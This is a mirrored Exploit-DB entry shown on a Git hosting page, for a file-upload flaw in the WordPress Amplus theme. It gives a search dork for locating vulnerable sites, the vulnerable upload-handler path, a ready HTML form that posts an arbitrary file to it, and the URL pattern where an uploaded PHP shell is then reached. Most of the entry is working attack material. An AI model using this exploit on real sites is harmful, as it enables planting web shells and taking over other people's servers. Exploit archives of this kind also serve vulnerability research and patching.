bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/29669.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

48 lines
No EOL
1.1 KiB
Text
Raw Blame History

#Title : Wordpress Amplus Themes CSRF File Upload Vulnerability
#Author : DevilScreaM
#Date : 11/17/2013 - 17 November 2013
#Category : Web Applications
#Type : PHP
#Vendor : http://themeforest.net
#Download : http://themeforest.net/item/amplus-responsive-multilingual-wordpress-theme/
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : CSRF
#Dork :
inurl:wp-content/themes/amplus
CSRF File Upload Vulnerability
Exploit & POC :
http://site-target/wp-content/themes/amplus/functions/upload-handler.php
Script :
<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
File Access :
http://site-target/uploads/[years]/[month]/your_shell.php
Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
Reference in a new issue View git blame Copy permalink